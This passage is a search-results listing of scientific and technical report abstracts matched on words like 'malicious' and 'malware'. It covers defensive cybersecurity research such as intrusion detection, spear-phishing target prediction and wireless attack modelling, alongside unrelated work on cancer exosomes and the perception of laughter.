    Exosomes are nanovesicles formed in the endosomal pathway with an important role in paracrine and autocrine cell communication. Exosomes secreted by cancer cells, malicious exosomes, have important roles in tumor microenvironment maturation and cancer progression. The knowledge of the role of exosomes in tumorigenesis prompted a new era in cancer diagnostics and therapy, taking advantage of the use of circulating exosomes as tumor biomarkers due to their stability in body fluids and targeting malignant exosomes’ release and/or uptake to inhibit or delay tumor development. In recent years, nanotechnology has paved the way for the development of a plethora of new diagnostic and therapeutic platforms, fostering theranostics. The unique physical and chemical properties of gold nanoparticles (AuNPs) make them suitable vehicles to pursue this goal. AuNPs’ properties such as ease of synthesis with the desired shape and size, high surface:volume ratio, and the possibility of engineering their surface as desired, potentiate AuNPs’ role in nanotheranostics, allowing the use of the same formulation for exosome detection and for restraining the effect of malicious exosomes in cancer progression. PMID:28098821

  20. Persona: Network Layer Anonymity and Accountability for Next Generation Internet

    NASA Astrophysics Data System (ADS)

    Mallios, Yannis; Modi, Sudeep; Agarwala, Aditya; Johns, Christina

    Individual privacy has become a major concern, due to the intrusive nature of the services and websites that collect increasing amounts of private information. One of the notions that can lead towards privacy protection is that of anonymity. Unfortunately, anonymity can also be maliciously exploited by attackers to hide their actions and identity. Thus some sort of accountability is also required. The current Internet has failed to provide both properties, as anonymity techniques are difficult to fully deploy and thus are easily attacked, while the Internet provides only a limited level of accountability. The Next Generation Internet (NGI) provides us with the opportunity to examine how these conflicting properties could be efficiently applied and thus protect users’ privacy while holding malicious users accountable. In this paper we present the design of a scheme, called Persona, that can provide anonymity and accountability in the network layer of NGI. More specifically, our design requirements are to combine these two conflicting desires in a stateless manner within routers. Persona allows users to choose different levels of anonymity, while it allows the discovery of malicious nodes.

  1. Tumor Microenvironment Modulation via Gold Nanoparticles Targeting Malicious Exosomes: Implications for Cancer Diagnostics and Therapy.

    PubMed

    Roma-Rodrigues, Catarina; Raposo, Luís R; Cabral, Rita; Paradinha, Fabiana; Baptista, Pedro V; Fernandes, Alexandra R

    2017-01-14

    Exosomes are nanovesicles formed in the endosomal pathway with an important role in paracrine and autocrine cell communication. Exosomes secreted by cancer cells, malicious exosomes, have important roles in tumor microenvironment maturation and cancer progression. The knowledge of the role of exosomes in tumorigenesis prompted a new era in cancer diagnostics and therapy, taking advantage of the use of circulating exosomes as tumor biomarkers due to their stability in body fluids and targeting malignant exosomes' release and/or uptake to inhibit or delay tumor development. In recent years, nanotechnology has paved the way for the development of a plethora of new diagnostic and therapeutic platforms, fostering theranostics. The unique physical and chemical properties of gold nanoparticles (AuNPs) make them suitable vehicles to pursue this goal. AuNPs' properties such as ease of synthesis with the desired shape and size, high surface:volume ratio, and the possibility of engineering their surface as desired, potentiate AuNPs' role in nanotheranostics, allowing the use of the same formulation for exosome detection and for restraining the effect of malicious exosomes in cancer progression.

  2. Agents Based e-Commerce and Securing Exchanged Information

    NASA Astrophysics Data System (ADS)

    Al-Jaljouli, Raja; Abawajy, Jemal

    Mobile agents have been implemented in e-Commerce to search and filter information of interest from electronic markets. When the information is very sensitive and critical, it is important to develop a novel security protocol that can efficiently protect the information from malicious tampering as well as unauthorized disclosure, or at least detect any malicious act of intruders. In this chapter, we describe robust security techniques that ensure a sound security of information gathered throughout the agent’s itinerary against various security attacks, as well as truncation attacks. A sound security protocol is described, which implements the various security techniques that would jointly prevent or at least detect any malicious act of intruders. We reason about the soundness of the protocol using Symbolic Trace Analyzer (STA), a formal verification tool that is based on symbolic techniques. We analyze the protocol in key configurations and show that it is free of flaws. We also show that the protocol fulfils the various security requirements of exchanged information in MAS, including data-integrity, data-confidentiality, data-authenticity, origin confidentiality and data non-repudiability.

  3. Real-time detection and classification of anomalous events in streaming data

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Ferragut, Erik M.; Goodall, John R.; Iannacone, Michael D.

    2016-04-19

    A system is described for receiving a stream of events and scoring the events based on anomalousness and maliciousness (or other classification). The events can be displayed to a user in user-defined groupings in an animated fashion. The system can include a plurality of anomaly detectors that together implement an algorithm to identify low probability events and detect atypical traffic patterns. The atypical traffic patterns can then be classified as being of interest or not. In one particular example, in a network environment, the classification can be whether the network traffic is malicious or not.

  4. Cyberbiosecurity: From Naive Trust to Risk Awareness.

    PubMed

    Peccoud, Jean; Gallegos, Jenna E; Murch, Randall; Buchholz, Wallace G; Raman, Sanjay

    2018-01-01

    The cyber-physical nature of biotechnology raises unprecedented security concerns. Computers can be compromised by encoding malware in DNA sequences, and biological threats can be synthesized using publicly available data. Trust within the biotechnology community creates vulnerabilities at the interface between cyberspace and biology. Awareness is a prerequisite to managing these risks.

  5. Spam Stoppers: Stave off the Spam Onslaught with Technology and Training

    ERIC Educational Resources Information Center

    Fryer, Wesley A.

    2005-01-01

    For schools, spam is not only an annoyance and a time waster; it clogs district mail servers, consumes valuable network bandwidth, and can deliver and propagate a variety of malware programs that can wreak havoc on their system. A district strategy to "can the spam," therefore, must be multifaceted and address security vulnerabilities at different…

  6. Intense or malicious? The decoding of eyebrow-lowering frowning in laughter animations depends on the presentation mode

    PubMed Central

    Hofmann, Jennifer

    2014-01-01

    Joyful laughter is the only laughter type that has received sufficient validation in terms of morphology (i.e., face, voice). Still, it is unclear whether joyful laughter involves one prototypical facial-morphological configuration (Duchenne Display and mouth opening) to be decoded as such, or whether qualitatively distinct facial markers occur at different stages of laughter intensity. It was proposed that intense laughter goes along with eyebrow-lowering frowning, but in decoding studies of pictures, these “frowns” were associated with perceived maliciousness rather than higher intensity. Thus, two studies were conducted to investigate the influence of the presentation mode (static, dynamic) and eyebrow-lowering frowning on the perception of laughter animations of different intensity. In Study 1, participants (N = 110) were randomly assigned to two presentation modes (static pictures vs. dynamic videos) to watch animations of Duchenne laughter and laughter with added eyebrow-lowering frowning. Ratings on the intensity, valence, and contagiousness of the laughter were completed. In Study 2, participants (N = 55) saw both animation types in both presentation modes sequentially. Results confirmed that the static presentation led to eyebrow-lowering frowning in intense laughter being perceived as more malicious, less intense, less benevolent, and less contagious compared to the dynamic presentation. This was replicated for maliciousness in Study 2, although participants could potentially infer the “frown” as a natural element of the laugh, as they had seen the video and the picture. Thus, a dynamic presentation is necessary for detecting graduating intensity markers in the joyfully laughing face. While this study focused on the decoding, future studies should investigate the encoding of frowning in laughter. This is important, as tools assessing facially expressed joy might need to account for laughter intensity markers that differ from the Duchenne Display. PMID:25477836

  7. Intense or malicious? The decoding of eyebrow-lowering frowning in laughter animations depends on the presentation mode.

    PubMed

    Hofmann, Jennifer

    2014-01-01

    Joyful laughter is the only laughter type that has received sufficient validation in terms of morphology (i.e., face, voice). Still, it is unclear whether joyful laughter involves one prototypical facial-morphological configuration (Duchenne Display and mouth opening) to be decoded as such, or whether qualitatively distinct facial markers occur at different stages of laughter intensity. It was proposed that intense laughter goes along with eyebrow-lowering frowning, but in decoding studies of pictures, these "frowns" were associated with perceived maliciousness rather than higher intensity. Thus, two studies were conducted to investigate the influence of the presentation mode (static, dynamic) and eyebrow-lowering frowning on the perception of laughter animations of different intensity. In Study 1, participants (N = 110) were randomly assigned to two presentation modes (static pictures vs. dynamic videos) to watch animations of Duchenne laughter and laughter with added eyebrow-lowering frowning. Ratings on the intensity, valence, and contagiousness of the laughter were completed. In Study 2, participants (N = 55) saw both animation types in both presentation modes sequentially. Results confirmed that the static presentation led to eyebrow-lowering frowning in intense laughter being perceived as more malicious, less intense, less benevolent, and less contagious compared to the dynamic presentation. This was replicated for maliciousness in Study 2, although participants could potentially infer the "frown" as a natural element of the laugh, as they had seen the video and the picture. Thus, a dynamic presentation is necessary for detecting graduating intensity markers in the joyfully laughing face. While this study focused on the decoding, future studies should investigate the encoding of frowning in laughter. This is important, as tools assessing facially expressed joy might need to account for laughter intensity markers that differ from the Duchenne Display.

  8. E-commerce Review System to Detect False Reviews.

    PubMed

    Kolhar, Manjur

    2017-08-15

    E-commerce sites have been doing profitable business since their induction in high-speed and secured networks. Moreover, they continue to influence consumers through various methods. One of the most effective methods is the e-commerce review rating system, in which consumers provide review ratings for the products used. However, almost all e-commerce review rating systems are unable to provide cumulative review ratings. Furthermore, review ratings are influenced by positive and negative malicious feedback ratings, collectively called false reviews. In this paper, we proposed an e-commerce review system framework developed using the cumulative sum method to detect and remove malicious review ratings.

  9. Trust recovery model of Ad Hoc network based on identity authentication scheme

    NASA Astrophysics Data System (ADS)

    Liu, Jie; Huan, Shuiyuan

    2017-05-01

    Mobile Ad Hoc network trust models are widely used to solve mobile Ad Hoc network security issues. Aiming at the problem of reduced network availability caused by the processing of malicious nodes and selfish nodes in trust-model-based mobile Ad Hoc network routing, an authentication mechanism for mobile Ad Hoc networks based on identity authentication is proposed, which uses identity authentication to identify malicious nodes and trust recovery for selfish nodes, in order to reduce network congestion and improve network quality. The simulation results show that the implementation of the mechanism can effectively improve the network availability and security.

  10. Dataset of anomalies and malicious acts in a cyber-physical subsystem.

    PubMed

    Laso, Pedro Merino; Brosset, David; Puentes, John

    2017-10-01

    This article presents a dataset produced to investigate how data and information quality estimations enable the detection of anomalies and malicious acts in cyber-physical systems. Data were acquired making use of a cyber-physical subsystem consisting of liquid containers for fuel or water, along with its automated control and data acquisition infrastructure. The described data consist of temporal series representing five operational scenarios - normal, anomalies, breakdown, sabotages, and cyber-attacks - corresponding to 15 different real situations. The dataset is publicly available in the .zip file published with the article, to investigate and compare faulty operation detection and characterization methods for cyber-physical systems.

  11. Host-Based Multivariate Statistical Computer Operating Process Anomaly Intrusion Detection System (PAIDS)

    DTIC Science & Technology

    2009-03-01

    3.2.3 Sub7 ...from TaskInfo in Excel Format. 3.2.3 Sub7 Also known as SubSeven, this is one of the best known, most widely distributed backdoor programs on the...engineering the spread of viruses, worms, backdoors and other malware. The Sub7 Trojan establishes a server on the victim computer that

  12. Communication Breakdown: DHS Operations During a Cyber Attack

    DTIC Science & Technology

    2010-12-01

    ...Presidential Directive, Malware, National Exercise, Quadrennial Homeland Security Review, Trusted Internet Connections, Zero-Day Exploits

  13. SEADE: Countering the Futility of Network Security

    DTIC Science & Technology

    2015-10-01

    guards, and computer cages) and logical security measures (network firewall and intrusion detection). However, no matter how many layers of network...security built-in and with minimal security dependence on network security appliances (e.g., firewalls). As Secretary of Defense Ashton Carter...based analysis that assumes nothing bad will happen to applications/data if those defenses prevent malware transactions at the entrance. The

  14. File Carving and Malware Identification Algorithms Applied to Firmware Reverse Engineering

    DTIC Science & Technology

    2013-03-21

    ...consider a byte value rate-of-change frequency metric [32]. Their system calculates the absolute value of the distance between all consecutive bytes, then...the rate-of-change means and standard deviations. Karresand and Shahmehri use the same distance metric for both byte value frequency and rate-of-change

  15. QuEST for malware type-classification

    NASA Astrophysics Data System (ADS)

    Vaughan, Sandra L.; Mills, Robert F.; Grimaila, Michael R.; Peterson, Gilbert L.; Oxley, Mark E.; Dube, Thomas E.; Rogers, Steven K.

    2015-05-01

    Current cyber-related security and safety risks are unprecedented, due in no small part to information overload and skilled cyber-analyst shortages. Advances in decision support and Situation Awareness (SA) tools are required to support analysts in risk mitigation. Inspired by human intelligence, research in Artificial Intelligence (AI) and Computational Intelligence (CI) have provided successful engineering solutions in complex domains including cyber. Current AI approaches aggregate large volumes of data to infer the general from the particular, i.e. inductive reasoning (pattern-matching) and generally cannot infer answers not previously programmed. Whereas humans, rarely able to reason over large volumes of data, have successfully reached the top of the food chain by inferring situations from partial or even partially incorrect information, i.e. abductive reasoning (pattern-completion); generating a hypothetical explanation of observations. In order to achieve an engineering advantage in computational decision support and SA we leverage recent research in human consciousness, the role consciousness plays in decision making, modeling the units of subjective experience which generate consciousness, qualia. This paper introduces a novel computational implementation of a Cognitive Modeling Architecture (CMA) which incorporates concepts of consciousness. We apply our model to the malware type-classification task. The underlying methodology and theories are generalizable to many domains.

  16. Omen: identifying potential spear-phishing targets before the email is sent.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Wendt, Jeremy Daniel.

    2013-07-01

    We present the results of a two year project focused on a common social engineering attack method called "spear phishing". In a spear phishing attack, the user receives an email with information specifically focused on the user. This email contains either a malware-laced attachment or a link to download the malware that has been disguised as a useful program. Spear phishing attacks have been one of the most effective avenues for attackers to gain initial entry into a target network. This project focused on a proactive approach to spear phishing. To create an effective, user-specific spear phishing email, the attacker must research the intended recipient. We believe that much of the information used by the attacker is provided by the target organization's own external website. Thus when researching potential targets, the attacker leaves signs of his research in the webserver's logs. We created tools and visualizations to improve cybersecurity analysts' abilities to quickly understand a visitor's visit patterns and interests. Given these suspicious visitors and log-parsing tools, analysts can more quickly identify truly suspicious visitors, search for potential spear-phishing targeted users, and improve security around those users before the spear phishing email is sent.

  17. A Survey on Anomaly Based Host Intrusion Detection System

    NASA Astrophysics Data System (ADS)

    Jose, Shijoe; Malathi, D.; Reddy, Bharath; Jayaseeli, Dorathi

    2018-04-01

    An intrusion detection system (IDS) is hardware, software or a combination of the two, for monitoring network or system activities to detect malicious signs. In computer security, designing a robust intrusion detection system is one of the most fundamental and important problems. The primary function of the system is to detect intrusions and give alerts in a timely manner when a user attempts an intrusion. In these techniques, when the IDS finds an intrusion it sends an alert message to the system administrator. Anomaly detection is an important problem that has been researched within diverse research areas and application domains. This survey tries to provide a structured and comprehensive overview of the research on anomaly detection. Each of the existing anomaly detection techniques has relative strengths and weaknesses. The current state of experimental practice in the field of anomaly-based intrusion detection is reviewed, together with a survey of recent studies in this area. This survey provides a study of existing anomaly detection techniques, and how the techniques used in one area can be applied in another application domain.

  18. IT Security Support for the Spaceport Command Control System Development

    NASA Technical Reports Server (NTRS)

    Varise, Brian

    2014-01-01

    My job title is IT Security support for the Spaceport Command & Control System Development. As a cyber-security analyst it is my job to ensure NASA's information stays safe from cyber threats, such as viruses, malware and denial-of-service attacks, by establishing and enforcing system access controls. Security is very important in the world of technology and it is used everywhere from personal computers to giant networks run by Government agencies worldwide. Without constant monitoring and analysis, businesses, public organizations and government agencies are vulnerable to potentially harmful infiltration of their computer information systems. It is my responsibility to ensure authorized access by examining improper access, reporting violations, revoking access, monitoring information requests by new programming and recommending improvements. My department oversees the Launch Control System and networks. An audit will be conducted for the LCS based on compliance with the Federal Information Security Management Act (FISMA) and The National Institute of Standards and Technology (NIST). I recently finished analyzing the SANS top 20 critical controls to give cost effective recommendations on various software and hardware products for compliance. Upon my completion of this internship, I will have successfully completed my duties as well as gained knowledge that will be helpful to my future career as a Cyber Security Analyst.

  19. Wireless Networks under a Backoff Attack: A Game Theoretical Perspective.

    PubMed

    Parras, Juan; Zazo, Santiago

    2018-01-30

    We study a wireless sensor network using CSMA/CA in the MAC layer under a backoff attack: some of the sensors of the network are malicious and deviate from the defined contention mechanism. We use Bianchi's network model to study the impact of the malicious sensors on the total network throughput, showing that it causes the throughput to be unfairly distributed among sensors. We model this conflict using game theory tools, where each sensor is a player. We obtain analytical solutions and propose an algorithm, based on Regret Matching, to learn the equilibrium of the game with an arbitrary number of players. Our approach is validated via simulations, showing that our theoretical predictions adjust to reality.

  20. Prevention of Malicious Nodes Communication in MANETs by Using Authorized Tokens

    NASA Astrophysics Data System (ADS)

    Chandrakant, N.; Shenoy, P. Deepa; Venugopal, K. R.; Patnaik, L. M.

    A rapid increase of wireless networks and mobile computing applications has changed the landscape of network security. A MANET is more susceptible to attacks than a wired network. As a result, attacks with malicious intent have been and will be devised to take advantage of these vulnerabilities and to cripple MANET operation. Hence we need to search for new architectures and mechanisms to protect wireless networks and mobile computing applications. In this paper, we examine the nodes that come under the vicinity of the base node and members of the network, and communication is provided to genuine nodes only. It is found that the proposed algorithm is an effective algorithm for security in MANETs.

  1. Accelerating Malware Detection via a Graphics Processing Unit

    DTIC Science & Technology

    2010-09-01

    Processing Unit; PE: Portable Executable; COFF: Common Object File Format...operating systems for the future [Szo05]. The PE format is an updated version of the common object file format (COFF) [Mic06]. Microsoft released a new...NAs02]. These alerts can be costly in terms of time and resources for individuals and organizations to investigate each misidentified file [YWL07] [Vak10

  2. Achieving Accountability in Cyberspace: Revolution or Evolution?

    DTIC Science & Technology

    2014-01-01

    hours, the malware propagates throughout both networks and begins to beacon to a site known for its state-sponsored cyberspace espionage activities...installation in the United States, communications personnel in a tenant unit, whose primary unclassified operating network is neither owned nor...protect its unclassified proprietary network. A known nation-state actor gains access to the company's network and begins to exfiltrate megabytes

  3. Visualization of Wind Data on Google Earth for the Three-dimensional Wind Field (3DWF) Model

    DTIC Science & Technology

    2012-09-01

    ActiveX components or XPCOM extensions can be used by JavaScript to write data to the local file system. Since there is an inherent risk, it is very...important to only use these types of objects (ActiveX or XPCOM) from a trusted source in order to minimize the exposure of a computer system to malware

  4. Anomaly-Based Intrusion Detection Systems Utilizing System Call Data

    DTIC Science & Technology

    2012-03-01

    Functionality Description Persistence mechanism Mimicry technique Camouflage malware image: • renaming its image • appending its image to victim...particular industrial plant. Exactly which one was targeted still remains unknown, however a majority of the attacks took place in Iran [24]. Due...plant to unstable phase and eventually physical damage. It is interesting to note that a particular block of code - block DB8061 is automatically

  5. Identification of Program Signatures from Cloud Computing System Telemetry Data

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Nichols, Nicole M.; Greaves, Mark T.; Smith, William P.

    Malicious cloud computing activity can take many forms, including running unauthorized programs in a virtual environment. Detection of these malicious activities while preserving the privacy of the user is an important research challenge. Prior work has shown the potential viability of using cloud service billing metrics as a mechanism for proxy identification of malicious programs. Previously this novel detection method has been evaluated in a synthetic and isolated computational environment. In this paper we demonstrate the ability of billing metrics to identify programs, in an active cloud computing environment, including multiple virtual machines running on the same hypervisor. The open source cloud computing platform OpenStack is used for private cloud management at Pacific Northwest National Laboratory. OpenStack provides a billing tool (Ceilometer) to collect system telemetry measurements. We identify four different programs running on four virtual machines under the same cloud user account. Programs were identified with up to 95% accuracy. This accuracy is dependent on the distinctiveness of telemetry measurements for the specific programs we tested. Future work will examine the scalability of this approach for a larger selection of programs to better understand the uniqueness needed to identify a program. Additionally, future work should address the separation of signatures when multiple programs are running on the same virtual machine.

  6. Safety and security of radioactive sources in industrial radiography in Bangladesh

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mollah, A. S.; Nazrul, M. Abdullah

    2013-07-01

    Malicious use of radioactive sources can involve dispersal of that material through an explosive device. There has been recognition of the threat posed by the potential malicious misuse of NDT radioactive sources by terrorists. The dispersal of radioactive material using conventional explosives, referred to as a 'dirty bomb', could create considerable panic, disruption and area access denial in an urban environment. However, as it is still a relatively new topic among regulators, users, and transport and storage operators worldwide, international assistance and cooperation in developing the necessary regulatory and security infrastructure is required. The most important action in reducing the risk of radiological terrorism is to increase the security of radioactive sources. This paper presents safety and security considerations for the transport and site storage of industrial radiography sources as per the national regulations entitled 'Nuclear Safety and Radiation Control Rules-1997'. The main emphasis was put on the stages of some safety and security actions in order to prevent theft, sabotage or other malicious acts during the transport of the packages. As a conclusion it must be mentioned that both safety and security considerations are very important aspects that must be taken into account for the transport and site storage of radioactive sources used in the practice of industrial radiography. (authors)

  7. Transport Traffic Analysis for Abusive Infrastructure Characterization

    DTIC Science & Technology

    2012-12-14

    Introduction Abusive traffic abounds on the Internet, in the form of email, malware, vulnerability scanners, worms, denial-of-service, drive-by-downloads, scam...insight is two-fold. First, attackers have a basic requirement to source large amounts of data, be it denial-of-service, scam-hosting, spam, or other...the network core. This paper explores the power of transport-layer traffic analysis to detect and characterize scam hosting infrastructure, including

  8. A Cyber Pearl Harbor

    DTIC Science & Technology

    2016-02-03

    specific intrusions that can vary in costs and damage. These medium-potential tools are used to access systems, sustain access, and hide access. In the...appropriate response. A cyber intrusion aimed at spying or extracting data will drive different international and domestic responses than a weapon...stealing credit cards or data to a DDoS or creating and selling malware to the highest bidder. Insecure cyberspace is a crime syndicate's dream in

  9. Using Streaming Analytics for Effective Real Time Network Visibility

    Science.gov Websites

    problem before it became a big issue. That's just one use case as to how you can make use of this sort of, having the ability to see all of your network traffic in one place, single pane of glass, will allow you, malware detection devices, other networks' ability tools. I was never able to see everything in one spot

  10. T-dominance: Prioritized Defense Deployment for BYOD Security (Post Print)

    DTIC Science & Technology

    2013-10-01

    infrastructure. Employees' demand/satisfaction, decreased IT acquisition and support cost, and increased use of cloud/virtualization technologies in...example, a report [8] on hijacking hotel Wi-Fi hotspots for drive-by malware attacks on laptops comes close to what we have in mind; practical man-in...obtaining unwarranted privilege, are often ignored for convenience, or circumvented for customization by the users. Rootkits, like iOS Jailbreak, are

  11. Wireless Networks under a Backoff Attack: A Game Theoretical Perspective

    PubMed Central

    Zazo, Santiago

    2018-01-01

    We study a wireless sensor network using CSMA/CA in the MAC layer under a backoff attack: some of the sensors of the network are malicious and deviate from the defined contention mechanism. We use Bianchi’s network model to study the impact of the malicious sensors on the total network throughput, showing that it causes the throughput to be unfairly distributed among sensors. We model this conflict using game theory tools, where each sensor is a player. We obtain analytical solutions and propose an algorithm, based on Regret Matching, to learn the equilibrium of the game with an arbitrary number of players. Our approach is validated via simulations, showing that our theoretical predictions adjust to reality. PMID:29385752

  12. An enhanced performance through agent-based secure approach for mobile ad hoc networks

    NASA Astrophysics Data System (ADS)

    Bisen, Dhananjay; Sharma, Sanjeev

    2018-01-01

    This paper proposes an agent-based secure enhanced performance approach (AB-SEP) for mobile ad hoc network. In this approach, agent nodes are selected through optimal node reliability as a factor. This factor is calculated on the basis of node performance features such as degree difference, normalised distance value, energy level, mobility and optimal hello interval of node. After selection of agent nodes, a procedure of malicious behaviour detection is performed using fuzzy-based secure architecture (FBSA). To evaluate the performance of the proposed approach, comparative analysis is done with conventional schemes using performance parameters such as packet delivery ratio, throughput, total packet forwarding, network overhead, end-to-end delay and percentage of malicious detection.

  13. Remote software upload techniques in future vehicles and their performance analysis

    NASA Astrophysics Data System (ADS)

    Hossain, Irina

    Updating software in vehicle Electronic Control Units (ECUs) will become a mandatory requirement for a variety of reasons, for example, to update/fix functionality of an existing system, add new functionality, remove software bugs and to cope with ITS infrastructure. Software modules of advanced vehicles can be updated using the Remote Software Upload (RSU) technique. RSU employs an infrastructure-based wireless communication technique where the software supplier sends the software to the targeted vehicle via a roadside Base Station (BS). However, security is critically important in RSU to avoid any disasters due to malfunctions of the vehicle and to protect the proprietary algorithms from hackers, competitors or people with malicious intent. In this thesis, a mechanism of secure software upload in advanced vehicles is presented which employs mutual authentication of the software provider and the vehicle using a pre-shared authentication key before sending the software. The software packets are sent encrypted with a secret key along with the Message Digest (MD). In order to increase the security level, it is proposed that the vehicle receive more than one copy of the software along with the MD in each copy. The vehicle will install the new software only when it receives more than one identical copy of the software. In order to validate the proposition, analytical expressions for the average number of packet transmissions for a successful software update are determined. Different cases are investigated depending on the vehicle's buffer size and verification methods. The analytical and simulation results show that it is sufficient to send two copies of the software to the vehicle to thwart any security attack while uploading the software. The above mentioned unicast method for RSU is suitable when software needs to be uploaded to a single vehicle. Since multicasting is the most efficient method of group communication, updating software in an ECU of a large number of vehicles could benefit from it. However, like the unicast RSU, the security requirements of multicast communication, i.e., authenticity, confidentiality and integrity of the software transmitted and access control of the group members, are challenging. In this thesis, an infrastructure-based mobile multicasting for RSU in vehicle ECUs is proposed where an ECU receives the software from a remote software distribution center using the roadside BSs as gateways. The Vehicular Software Distribution Network (VSDN) is divided into small regions administered by a Regional Group Manager (RGM). Two multicast Group Key Management (GKM) techniques are proposed based on the degree of trust in the BSs, named Fully-trusted (FT) and Semi-trusted (ST) systems. Analytical models are developed to find the multicast session establishment latency and handover latency for these two protocols. The average latency to perform mutual authentication of the software vendor and a vehicle, to send the multicast session key by the software provider during multicast session initialization, and the handoff latency during the multicast session are calculated. Analytical and simulation results show that the link establishment latency per vehicle of our proposed schemes is in the range of a few seconds and the ST system requires a few ms more time than the FT system. The handoff latency is also in the range of a few seconds and in some cases the ST system requires less handoff time than the FT system. Thus, it is possible to build an efficient GKM protocol without putting too much trust in the BSs.

  14. Security-Enhanced Push Button Configuration for Home Smart Control.

    PubMed

    Han, Junghee; Park, Taejoon

    2017-06-08

    With the emergence of smart and converged home services, the need for the secure and easy interplay of various devices has been increased. Push Button Configuration (PBC) is one of the technologies proposed for easy set-up of a secure session between IT and consumer devices. Although the Wi-Fi Direct specification explicitly states that all devices must support the PBC method, its applicability is very limited. This is because the security vulnerability of PBC can be maliciously exploited so that attackers can make illegitimate sessions with consumer devices. To address this problem, this paper proposes a novel Security-enhanced PBC (SePBC) scheme with which we can uncover suspicious or malicious devices. The proposed mechanism has several unique features. First, we develop a secure handshake distance measurement protocol by preventing an adversary sitting outside the region from maliciously manipulating its distance to be fake. Second, it is compatible with the original Wi-Fi PBC without introducing a brand-new methodology. Finally, SePBC uses lightweight operations without CPU-intensive cryptography computation and employs inexpensive H/W. Moreover, it needs to incur little overhead when there is no attack. This paper also designs and implements the proposed SePBC in the real world. Our experimental results and analysis show that the proposed SePBC scheme effectively defeats attacks on PBC while minimizing the modification of the original PBC equipment.

  15. Security-Enhanced Push Button Configuration for Home Smart Control †

    PubMed Central

    Han, Junghee; Park, Taejoon

    2017-01-01

    With the emergence of smart and converged home services, the need for the secure and easy interplay of various devices has been increased. Push Button Configuration (PBC) is one of the technologies proposed for easy set-up of a secure session between IT and consumer devices. Although the Wi-Fi Direct specification explicitly states that all devices must support the PBC method, its applicability is very limited. This is because the security vulnerability of PBC can be maliciously exploited so that attackers can make illegitimate sessions with consumer devices. To address this problem, this paper proposes a novel Security-enhanced PBC (SePBC) scheme with which we can uncover suspicious or malicious devices. The proposed mechanism has several unique features. First, we develop a secure handshake distance measurement protocol by preventing an adversary sitting outside the region from maliciously manipulating its distance to be fake. Second, it is compatible with the original Wi-Fi PBC without introducing a brand-new methodology. Finally, SePBC uses lightweight operations without CPU-intensive cryptography computation and employs inexpensive H/W. Moreover, it needs to incur little overhead when there is no attack. This paper also designs and implements the proposed SePBC in the real world. Our experimental results and analysis show that the proposed SePBC scheme effectively defeats attacks on PBC while minimizing the modification of the original PBC equipment. PMID:28594370

  16. Mitigating Inadvertent Insider Threats with Incentives

    NASA Astrophysics Data System (ADS)

    Liu, Debin; Wang, Xiaofeng; Camp, L. Jean

    Inadvertent insiders are trusted insiders who do not have malicious intent (as with malicious insiders) but do not responsibly manage security. The result is often that a malicious outsider is enabled to use the privileges of the inattentive insider to implement an insider attack. This risk is as old as the conversion of a weak user password into root access, but the term inadvertent insider was recently coined to identify the link between the behavior and the vulnerability. In this paper, we propose to mitigate this threat using a novel risk budget mechanism that offers incentives to an insider to behave according to the risk posture set by the organization. We propose assigning an insider a risk budget, which is a specific allocation of risk points, allowing employees to take a finite number of risk-seeking choices. In this way, the employee can complete her tasks without subverting the security system, as with absolute prohibitions. In the end, the organization penalizes the insider if she fails to accomplish her task within the budget while rewarding her in the presence of a surplus. Most importantly, the risk budget requires that the user make conscious visible choices to take electronic risks. We describe the theory behind the system, including specific work on the insider threats. We evaluated this approach using human-subject experiments, which demonstrate the effectiveness of our risk budget mechanism. We also present a game theoretic analysis of the mechanism.

  17. Recommendations for Model Driven Paradigms for Integrated Approaches to Cyber Defense

    DTIC Science & Technology

    2017-03-06

analogy (e.g., Susceptible, Infected, Recovered [SIR]) • Abstract wargaming: game-theoretic model of cyber conflict without modeling the underlying...malware. 3.7 Abstract Wargaming Here, a game-theoretic process is modeled with moves and effects inspired by cyber conflict but without modeling the...underlying processes of cyber attack and defense. Examples in literature include the following: • Cho J-H, Gao J. Cyber war game in temporal networks

  18. Extension of the Genetic Algorithm Based Malware Strategy Evolution Forecasting Model for Botnet Strategy Evolution Modeling

    DTIC Science & Technology

    2010-11-01

CHEN, Yan; PAXSON, Vern (2009). Automating Analysis of Large-Scale Botnet Probing Events. ASIACCS '09: Proceedings of the 4th International...2004). Email Virus Propagation Modeling and Analysis. Technical report TRCSE-03-04. – University of Massachusetts, 2004. [37] RAMACHANDRAN, Krishna ...20, 8 pp. [38] STANIFORD, Stuart; PAXSON, Vern; WEAVER, Nicholas (2002). How to 0wn the Internet in Your Spare Time. Proceedings of the 11th

  19. Engaging the Nation’s Critical Infrastructure Sector to Deter Cyber Threats

    DTIC Science & Technology

    2013-03-01

is the component of CyberOps that extends cyber power beyond the defensive boundaries of the GIG to detect, deter, deny, and defeat adversaries... economy.16 DDOS attacks are based on multiple, malware-infected personal computers, organized into networks called botnets, and are directed by...not condemn the actions of those involved. Of the two attacks on Estonia and Georgia, it was Estonia that had the greatest damage to its economy

  20. Malware Pandemics

    DTIC Science & Technology

    2010-09-01

in T-Mobile’s 3G IP range began experiencing extortion popup windows. The popup window notifies the victim that the phone has been hacked, and...range, 192.168.0.0/16. Such scanning may be of particular interest when the victim’s iPhone opportunistically connects to a WiFi LAN for Internet...connected to local WiFi networks should understand that the convenience of their Internet-tethered web, media, and email service, comes with a

  1. A Next Generation Repository for Sharing Sensitive Network and Security Data

    DTIC Science & Technology

    2018-01-01

submission, and 5 yearly IRB reviews d. Provided legal support for MOA data provider and host agreements and amendments e. Feedback and bug reporting...intrusion detection methods and systems, b) event-reconstruction and evidence-based insights into global trends (e.g., DDoS attacks and malware...propagation), and c) situational awareness (e.g., outage detection). We have leveraged IMPACT’s policy and legal framework to minimize any risks associated

  2. Technical note: Efficient online source identification algorithm for integration within a contamination event management system

    NASA Astrophysics Data System (ADS)

    Deuerlein, Jochen; Meyer-Harries, Lea; Guth, Nicolai

    2017-07-01

Drinking water distribution networks are part of critical infrastructures and are exposed to a number of different risks. One of them is the risk of unintended or deliberate contamination of the drinking water within the pipe network. Over the past decade research has focused on the development of new sensors that are able to detect malicious substances in the network and on early warning systems for contamination. In addition to the optimal placement of sensors, the automatic identification of the source of a contamination is an important component of an early warning and event management system for security enhancement of water supply networks. Many publications deal with the algorithmic development; however, little information exists about the integration within a comprehensive real-time event detection and management system. In the following, the analytical solution and the software implementation of a real-time source identification module and its integration within a web-based event management system are described. The development was part of the SAFEWATER project, which was funded under FP 7 of the European Commission.

